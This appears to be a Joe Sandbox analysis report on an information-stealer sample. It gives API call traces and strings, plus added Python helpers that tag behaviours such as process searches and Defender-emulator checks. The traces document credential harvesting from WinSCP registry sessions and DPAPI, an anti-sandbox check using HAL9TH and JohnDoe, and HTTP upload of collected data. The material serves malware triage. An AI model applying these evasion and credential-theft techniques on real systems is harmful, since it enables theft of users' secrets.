• Opcode ID: d8211fd8e573a28c3e70cabb12c3cf3b015e483f0ea181fb9f00660d99aee7de
• Instruction ID: 7f4ba897aa092a6dd6f6dcc7e3a387a387aa00e58e44c08bc84a2dc2e29a47a9
• Opcode Fuzzy Hash: d8211fd8e573a28c3e70cabb12c3cf3b015e483f0ea181fb9f00660d99aee7de
• Instruction Fuzzy Hash: E2012D71A01219AFDB11DFA4DC05AEEBBF8EF05341F0081A5E81AE6150D7309B45CFA1
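Two of the records above are the primitives a triage analyst keys on in a stealer: the function at 0034E91E enumerates keyboard layouts and resolves each one with GetLocaleInfoA(LCType 0x2, which is LOCALE_SLANGUAGE) into a "/"-joined language list, and the functions at 0034FD43 and 0034FE1E take a TH32CS_SNAPPROCESS (0x2) snapshot, walk it with Process32First/Process32Next and compare each entry name with StrCmpCA. The following Python is an added example, not part of the report or of the sample: it parses lines in the report's own "APIs" format, decodes the resolved arguments that are documented Win32 constants, and tags a record with a behaviour label when its direct calls match an API set. The record text is copied (abridged) from the report; the regular expression, the behaviour labels and the lookup tables are this example's own assumptions.

```python
"""Tag Joe Sandbox "APIs" records with stealer-typical behaviours.

Added example; not part of the report or of the analysed sample. Record text
is copied (abridged) from the report; the regex, behaviour labels and lookup
tables are assumptions, the constant values are documented Win32 values.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Record at 0034E91E: keyboard layouts -> GetLocaleInfoA(LOCALE_SLANGUAGE).
RECORD_LOCALE = """\
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• GetKeyboardLayoutList.USER32(00000000,00000000,0035E266,00361678,003613FC,00361ECC), ref: 0034E91E
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0034E92C
• GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0034E936
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0034E95B
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
• LocalFree.KERNEL32(00000000), ref: 0034E9DB
"""
# Record at 0034FD43: process snapshot walked with a name compare.
RECORD_PROCESS_SCAN = """\
• _EH_prolog.MSVCRT ref: 0034FD1D
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,00361ECC), ref: 0034FD43
• Process32First.KERNEL32(00000000,?), ref: 0034FD53
• Process32Next.KERNEL32(00000000,?), ref: 0034FD65
• StrCmpCA.SHLWAPI(?,?), ref: 0034FD79
• CloseHandle.KERNEL32(00000000), ref: 0034FD8F
"""

# One "APIs" line: [Part of subcall function XXXX:] Name.MODULE[(args)], ref: ADDR
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass(frozen=True)
class Call:
    name: str
    module: str
    args: Tuple[str, ...]    # raw tokens: "?" (unresolved) or 8 hex digits
    ref: int                 # call-site address from the record
    subcall: Optional[int]   # callee the line belongs to, if nested


def parse_record(text: str) -> List[Call]:
    """Parse one record; lines that are not API calls are skipped, not guessed."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(Call(m["name"], m["module"], args, int(m["ref"], 16),
                          int(m["sub"], 16) if m["sub"] else None))
    return calls


# (API, argument index) -> {value: symbolic name}; documented Win32 constants.
KNOWN_ARGS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS"},
    ("GetLocaleInfoA", 1): {0x2: "LOCALE_SLANGUAGE"},
    ("LocalAlloc", 0): {0x40: "LPTR (LMEM_FIXED|LMEM_ZEROINIT)"},
    ("CoCreateInstance", 2): {0x1: "CLSCTX_INPROC_SERVER"},
}


def decode_args(call: Call) -> Dict[int, str]:
    """Map argument index -> constant name for resolved arguments we know."""
    out: Dict[int, str] = {}
    for i, tok in enumerate(call.args):
        table = KNOWN_ARGS.get((call.name, i))
        if tok != "?" and table and int(tok, 16) in table:
            out[i] = table[int(tok, 16)]
    return out


# Label -> (APIs that must all appear, APIs of which at least one must appear).
BEHAVIOURS = {
    "process-enumeration-with-name-compare": (
        {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
        {"StrCmpCA", "StrCmpCW", "StrCmpIA", "lstrcmpA", "lstrcmpiA"},
    ),
    "keyboard-layout-and-language-enumeration": (
        {"GetKeyboardLayoutList"},
        {"GetLocaleInfoA", "GetLocaleInfoW"},
    ),
}


def classify(calls: List[Call], include_subcalls: bool = False) -> List[str]:
    """Behaviour labels satisfied by the record. Sub-call lines are ignored by
    default so a label describes the function itself, not its string helpers."""
    names = {c.name for c in calls if include_subcalls or c.subcall is None}
    return [label for label, (all_of, any_of) in BEHAVIOURS.items()
            if all_of <= names and names & any_of]


if __name__ == "__main__":
    for title, text in (("0034E91E", RECORD_LOCALE), ("0034FD43", RECORD_PROCESS_SCAN)):
        calls = parse_record(text)
        print(title, classify(calls))
        for c in calls:
            for i, sym in decode_args(c).items():
                print(f"  {c.name} @ {c.ref:08X}: arg{i} = {sym}")
```

Sub-call lines are excluded by default because the lstrcpy/lstrcat helpers below a function say nothing about what the function does; the record at 0034FE1E, which differs from 0034FD43 only in its resolved PROCESSENTRY32 pointer, receives the same label. Extend KNOWN_ARGS only with values you can cite from the Win32 headers: an unresolved "?" must stay undecoded rather than be guessed.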
APIs
• _EH_prolog.MSVCRT ref: 0034FDF8
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0034FE1E
• Process32First.KERNEL32(00000000,00000128), ref: 0034FE2E
• Process32Next.KERNEL32(00000000,00000128), ref: 0034FE40
• StrCmpCA.SHLWAPI(?,?), ref: 0034FE54
• CloseHandle.KERNEL32(00000000), ref: 0034FE65
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 186290926-0
                                                                                                                                                                                      • Opcode ID: ab397bef79e9c6cb5be8fbc7ffa67b2c80c6cf881a1bd23a32932b38b0060761
                                                                                                                                                                                      • Instruction ID: dbe45bb7ff359a0ca577501bdacec8680cf2a71556db1034271c23d8b1b5fee1
                                                                                                                                                                                      • Opcode Fuzzy Hash: ab397bef79e9c6cb5be8fbc7ffa67b2c80c6cf881a1bd23a32932b38b0060761
                                                                                                                                                                                      • Instruction Fuzzy Hash: 200175759042199EDB12DFA4DC18BEFBBBCEF15341F048065E805E2251D7349B86CBA1
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
• HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
• GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: the same fifteen 00340000-module dumps listed in the record above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Heap$AllocNameProcessUser
• String ID: HAL9TH
• API String ID: 1206570057-1811034163
• Opcode ID: 2be45d2ce0f84a29640d3bc3778c195e759732b9a80411748051913ea27be671
• Instruction ID: ad975d9c4e52abd632112da14fdf9072b8ac63d04229b4cc006e3d590f27055f
• Opcode Fuzzy Hash: 2be45d2ce0f84a29640d3bc3778c195e759732b9a80411748051913ea27be671
• Instruction Fuzzy Hash: 12D05EB6200304BBE7059B96DC4DE8A7ABCEB88767F100095F602D32E0DAF09A448630
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: strcmp
• String ID: BINARY$NOCASE$RTRIM$kqa$main
• API String ID: 1004003707-114998471
• Opcode ID: 694ae7556137f234ec2c6432c806d824fda4080725e1e85f3b9c2a892dd384d1
• Instruction ID: 60bcc8b0197c989f7013f8b1edc5a9d28cf944306873f66ca73508c1f88d5ce1
• Opcode Fuzzy Hash: 694ae7556137f234ec2c6432c806d824fda4080725e1e85f3b9c2a892dd384d1
• Instruction Fuzzy Hash: DEE149B4A087858BEB00DF68C59474ABBF1BF89308F24C86DEC989F395D779C8458B51
APIs
• Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0035E266,00361678,003613FC), ref: 0034EE3E
• Process32First.KERNEL32(00000000,?), ref: 0034EE4E
• Process32Next.KERNEL32(00000000,?), ref: 0034EEA4
• CloseHandle.KERNEL32(00000000), ref: 0034EEAF
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: the same fifteen 00340000-module dumps listed in the first record above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
• String ID:
• API String ID: 907984538-0
• Opcode ID: 50373ede96c16ae01358e9887980cf49d15f8373d21c56836eba910937525a56
• Instruction ID: d9a1307dd1d088396eeb86c90661d17e2cbc3e4dbb69be621c7d2f305283f19c
• Opcode Fuzzy Hash: 50373ede96c16ae01358e9887980cf49d15f8373d21c56836eba910937525a56
• Instruction Fuzzy Hash: 4A01C4316001146BDB03F7A4CC06EEF77FCBF89B00F014065F60AEA190EB34AA468B95
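The three records above are the kind of block a triager wants to pull out of a long report mechanically: a Process32Next loop paired with StrCmpCA (the "searches for specific processes" behaviour), GetUserNameA in a block whose arguments carry the strings HAL9TH and JohnDoe (the computer and user name of the Windows Defender emulation environment, a sandbox check common in stealers of this family), and a plain CreateToolhelp32Snapshot/Process32First/Process32Next enumeration. The Python below is an added example, not part of the Joe Sandbox report and not the sample's own code: it parses records in the plain-text layout shown on this page and tags them. The sample text is copied from the three records above (dump-source and hash lines other than the Instruction Fuzzy Hash omitted); the tag names and the list of compare APIs are choices made for this example.

```python
"""Triage helper for Joe Sandbox function-block records (added example).

Tags:
  defender-emulator-check  GetUserName*/GetComputerName* in a block whose
                           arguments or String ID carry HAL9TH / JohnDoe
  process-search           Process32Next loop plus a string-compare API
  process-enumeration      Process32Next loop without a compare in the block
"""
import re
from dataclasses import dataclass, field

# Computer name / user name used by the Windows Defender AV emulator.
SANDBOX_NAMES = {"HAL9TH", "JohnDoe"}
NAME_APIS = {"GetUserNameA", "GetUserNameW", "GetComputerNameA", "GetComputerNameW"}
# Compare functions a process-search loop typically pairs with Process32Next
# (list chosen for this example; extend as needed).
COMPARE_APIS = {"StrCmpCA", "StrCmpCW", "StrCmpIA", "StrCmpIW", "lstrcmpA",
                "lstrcmpW", "lstrcmpiA", "lstrcmpiW", "strcmp", "_stricmp"}

# "• Name.MODULE(args), ref: ADDR", optionally prefixed with a subcall note.
API_RE = re.compile(
    r"^•\s*(Part of subcall function [0-9A-F]+:\s*)?"
    r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Z0-9]+)\((.*)\),\s*ref:\s*([0-9A-F]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list      # raw argument tokens as printed by the sandbox
    ref: str        # call-site address
    subcall: bool   # True for "Part of subcall function ..." lines


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    string_ids: list = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""


def parse_blocks(text):
    """Split report text into blocks; a block ends at its Instruction Fuzzy Hash line."""
    blocks, cur = [], FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            subcall, name, module, args, ref = m.groups()
            toks = [a.strip() for a in args.split(",")]
            cur.calls.append(ApiCall(name, module, toks, ref, subcall is not None))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• String ID:"):
            val = line.split(":", 1)[1].strip()
            cur.string_ids = val.split("$") if val else []
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
            blocks.append(cur)
            cur = FunctionBlock()
    return blocks


def api_names(block):
    return {c.name for c in block.calls}


def tokens(block):
    """Every argument token and String ID in the block, for indicator matching."""
    toks = set(block.string_ids)
    for c in block.calls:
        toks.update(c.args)
    return toks


def checks_sandbox_names(block):
    return bool(api_names(block) & NAME_APIS) and bool(tokens(block) & SANDBOX_NAMES)


def enumerates_processes(block):
    return bool(api_names(block) & {"Process32Next", "Process32NextW"})


def searches_for_process(block):
    return enumerates_processes(block) and bool(api_names(block) & COMPARE_APIS)


def triage(text):
    """Return [(api_id, [tags])] for every block in the text."""
    out = []
    for b in parse_blocks(text):
        tags = []
        if checks_sandbox_names(b):
            tags.append("defender-emulator-check")
        if searches_for_process(b):
            tags.append("process-search")
        elif enumerates_processes(b):
            tags.append("process-enumeration")
        out.append((b.api_id, tags))
    return out


# Sample input copied from the three records on this page (trimmed as noted).
SAMPLE = """\
APIs
• Process32Next.KERNEL32(00000000,00000128), ref: 0034FE40
• StrCmpCA.SHLWAPI(?,?), ref: 0034FE54
• CloseHandle.KERNEL32(00000000), ref: 0034FE65
• API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
• String ID:
• Instruction Fuzzy Hash: 200175759042199EDB12DFA4DC18BEFBBBCEF15341F048065E805E2251D7349B86CBA1
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
• HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
• GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
• API ID: Heap$AllocNameProcessUser
• String ID: HAL9TH
• Instruction Fuzzy Hash: 12D05EB6200304BBE7059B96DC4DE8A7ABCEB88767F100095F602D32E0DAF09A448630
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0035E266,00361678,003613FC), ref: 0034EE3E
• Process32First.KERNEL32(00000000,?), ref: 0034EE4E
• Process32Next.KERNEL32(00000000,?), ref: 0034EEA4
• CloseHandle.KERNEL32(00000000), ref: 0034EEAF
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
• String ID:
• Instruction Fuzzy Hash: 4A01C4316001146BDB03F7A4CC06EEF77FCBF89B00F014065F60AEA190EB34AA468B95
"""

if __name__ == "__main__":
    for api_id, tags in triage(SAMPLE):
        print(f"{api_id:70} {', '.join(tags) or '-'}")
```

Run against a full report export, the same parser groups blocks by API ID so that the Instruction Fuzzy Hash of a tagged block can be carried over to other samples for similarity hunting; the argument tokens are matched verbatim, so a sample that builds the names at runtime instead of passing them as literals would need the String ID field or a memory-string match rather than the call-argument trace.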
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0035E266,?,0000000F,0000000F,?,0034471F,?,?,?,?), ref: 0034F8E7
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,0034471F,?,?,?,?,?,?), ref: 0034F8F4
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,0034471F,?,?,?,?,?,?), ref: 0034F8FB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateBinaryCryptProcessString
• String ID:
• API String ID: 869800140-0
• Opcode ID: 156eea36222da6622e52b820e2f3d6c5f5203d69adb16a8c8fce5d48b64bee2a
• Instruction ID: 7515f1697c553eb26775e3aa5ceba8ea4f19fbf351526ccc643dfb9ecd3e89c4
• Opcode Fuzzy Hash: 156eea36222da6622e52b820e2f3d6c5f5203d69adb16a8c8fce5d48b64bee2a
• Instruction Fuzzy Hash: 04011771505209BFDF028FA5DC88DAFBBADFF49350B144468F94596210D731A991EB60
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,003613FC), ref: 0034E8BC
• HeapAlloc.KERNEL32(00000000), ref: 0034E8C3
• GetTimeZoneInformation.KERNEL32(?), ref: 0034E8D2
• wsprintfA.USER32 ref: 0034E8F0
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Heap$AllocInformationProcessTimeZonewsprintf
• String ID:
• API String ID: 362916592-0
• Opcode ID: 2bdcaea174d3295df13835e8eca66ec47c682167555f75c39892c66a9cb052e4
• Instruction ID: 278984088ac0cbd992d862376751b8aaef8280b72c06137f6a7471c8d1645199
• Opcode Fuzzy Hash: 2bdcaea174d3295df13835e8eca66ec47c682167555f75c39892c66a9cb052e4
• Instruction Fuzzy Hash: 8AE02272704320BBEB10A7E8AC0EE9A376CAB41324F014211F61AD61D0E6B0998186A1
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00346AC7
• LocalAlloc.KERNEL32(00000040,?,?), ref: 00346ADF
• LocalFree.KERNEL32(?), ref: 00346AFD
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID:
• API String ID: 2068576380-0
• Opcode ID: cae16a69884c4065627192b8a2cdd925281d3769dea07b65f7d5750a4d9baf9c
• Instruction ID: 1a1ceddee320f98b741e66e992c3f687c8b7afa5f71d80a1b9f850e3ed6d8154
• Opcode Fuzzy Hash: cae16a69884c4065627192b8a2cdd925281d3769dea07b65f7d5750a4d9baf9c
• Instruction Fuzzy Hash: 48011DB6900208AFDB01DFE8DD858DEBBFDEF48214B104865F915E7210D6719E418F51
Strings
• multiple recursive references: %s, xrefs: 61E76A4B
• recursive reference in a subquery: %s, xrefs: 61E76A54
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID:
• String ID: multiple recursive references: %s$recursive reference in a subquery: %s
• API String ID: 0-3854365051
• Opcode ID: 297298a0f659725ea1119cf4835fa01018d93a3eeff2d039f5330e37d216fd09
• Instruction ID: 7d5e909c26c2478cc4d8a1152a5e5b16c7ea0641b558a5fde8b477d39de8e8ad
• Opcode Fuzzy Hash: 297298a0f659725ea1119cf4835fa01018d93a3eeff2d039f5330e37d216fd09
• Instruction Fuzzy Hash: 4E8207B4A052899FEB25CFA8C180B9DBBF1BF48308F24C559E859AB355D734E846CF50
APIs
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: InfoSystemwsprintf
• String ID:
• API String ID: 2452939696-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: memcmp
• String ID:
• API String ID: 1475443563-0

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: strlen$Heap$AllocateProcesslstrlen
• String ID: In the interim between those two positions, she studied public health at Witswatersrand Advanced Technikon in 1971, and during her time there, she won an award from the South African Institute of Public Health for obtaining the highest marks in the country$bW5
• API String ID: 2756412249-484018327

Control-flow Graph

APIs
• memset.MSVCRT ref: 0034D48A
• memset.MSVCRT ref: 0034D4AA
• memset.MSVCRT ref: 0034D4BE
• memset.MSVCRT ref: 0034D4D2
• memset.MSVCRT ref: 0034D4E1
• memset.MSVCRT ref: 0034D4EF
• memset.MSVCRT ref: 0034D500
• RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0034D528
• RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0034D550
• RegCloseKey.ADVAPI32(?), ref: 0034D562
• RegCloseKey.ADVAPI32(?), ref: 0034D57D
• RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0034D597
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0034D5B4
• RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,0035E266), ref: 0034D632
• RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0034D67C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: memset$Value$CloseOpen$Enum
• String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
• API String ID: 4264500687-2798830873

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
                                                                                                                                                                                        • Part of subcall function 00343EF3: lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
                                                                                                                                                                                        • Part of subcall function 00343EF3: InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034472B
                                                                                                                                                                                        • Part of subcall function 0034F8C3: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0035E266,?,0000000F,0000000F,?,0034471F,?,?,?,?), ref: 0034F8E7
                                                                                                                                                                                        • Part of subcall function 0034F8C3: GetProcessHeap.KERNEL32(00000000,?,?,0034471F,?,?,?,?,?,?), ref: 0034F8F4
                                                                                                                                                                                        • Part of subcall function 0034F8C3: RtlAllocateHeap.NTDLL(00000000,?,0034471F,?,?,?,?,?,?), ref: 0034F8FB
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E266,0035E266,0035E266,0035E266), ref: 0034477D
                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034479D
                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0034487E
                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 003448B8
                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003448DD
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00361348,00000000,?,?,00000000), ref: 00344CBB
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00344CCC
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00344CDB
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00344CE2
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00344CF4
                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 00344D07
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00344D1E
                                                                                                                                                                                      • memcpy.MSVCRT(?), ref: 00344D28
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00344D39
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00344D52
